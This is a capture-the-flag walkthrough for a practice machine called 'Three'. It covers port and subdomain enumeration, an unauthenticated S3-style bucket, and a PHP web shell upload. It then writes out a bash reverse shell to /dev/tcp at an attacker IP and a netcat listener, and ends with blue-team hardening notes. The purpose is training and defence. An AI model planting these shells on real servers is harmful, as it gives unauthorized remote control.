Three#
Description#
Three is a Linux machine hosting a website that uses an AWS S3 bucket as its cloud storage.
The bucket is misconfigured, allowing us to upload a malicious file.
By executing this file through the website, we can gain remote access to the system and retrieve the flag.
Enumeration#
Step 1: Scanning the Target for Open Ports#
Start with a full port scan to identify services running on the machine:
nmap -sV -p- 10.129.227.248 -T4
Output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Findings:
- Port 22 (SSH) is open.
- Port 80 (HTTP) is hosting a website.
Step 2: Exploring the Website#
- Visit the site in your browser using the target IP on port 80.
- Check the Contact section and note the email address:
mail@thetoppers.htb - Since the domain
thetoppers.htbis being used, map it to the target IP in your/etc/hostsfile:echo "10.129.227.248 thetoppers.htb" | sudo tee -a /etc/hosts
Tip:
/etc/hostslets you manually link a domain name to an IP address so your computer can access the site without DNS.
Step 3: Enumerating Subdomains#
Use ffuf to brute-force possible subdomains:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://thetoppers.htb \
-H "Host: FUZZ.thetoppers.htb" \
-ac
Result:
s3.thetoppers.htb
Map this subdomain as well:
echo "10.129.227.248 s3.thetoppers.htb" | sudo tee -a /etc/hosts
Visit it in the browser or via curl:
curl http://s3.thetoppers.htb
Output:
{"status": "running"}
This indicates that the site is using an Amazon S3-like storage service.
What is Amazon S3? Amazon Simple Storage Service (S3) is a cloud service that stores files. A misconfigured S3 bucket can allow unauthorized reading, writing, or deleting of files.
Configuring and Interacting with the S3 Bucket#
Step 4: Setting Up AWS CLI#
Install and configure the AWS CLI if you haven’t already:
aws configure
Use temporary placeholder values since authentication is not enforced:
AWS Access Key ID [None]: temp
AWS Secret Access Key [None]: temp
Default region name [None]: temp
Default output format [None]: temp
Step 5: Listing Buckets and Files#
List all available buckets:
aws --endpoint=http://s3.thetoppers.htb s3 ls
List files inside the bucket:
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
Exploiting the S3 Bucket#
Step 6: Uploading a Web Shell#
Create a simple PHP shell locally:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Upload the shell:
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
Visit the uploaded file to test command execution:
http://thetoppers.htb/shell.php?cmd=whoami
Output:
www-data
This confirms that you can run commands on the server.
Step 7: Setting Up a Reverse Shell#
Create a reverse shell script locally (change 10.10.16.2 to your attacker IP):
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.16.2/1234 0>&1' > shell.sh
Upload the script:
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.sh s3://thetoppers.htb
Set up a listener on your machine:
nc -lvnp 1234
Trigger the reverse shell by visiting:
http://thetoppers.htb/shell.php?cmd=bash%20shell.sh
Output:
listening on [any] 1234 ...
connect to [10.10.16.2] from (UNKNOWN) [10.129.227.248] 44028
bash: no job control in this shell
www-data@three:/var/www/html$
Post-Exploitation#
Step 8: Finding the Flag#
Once connected, look for the flag:
locate flag.txt
Output:
/var/www/flag.txt
Read the flag:
cat /var/www/flag.txt
Blue Team Notes#
The root cause is a publicly writable S3 bucket.
To prevent such issues:
- Restrict bucket permissions to only trusted IAM users.
- Disable public access unless explicitly required.
- Monitor bucket activity logs for unusual operations.
Key Takeaways#
- Misconfigured S3 buckets are a common attack vector.
- Always enumerate subdomains when testing web applications.
- Gaining command execution can often lead to a reverse shell for deeper access.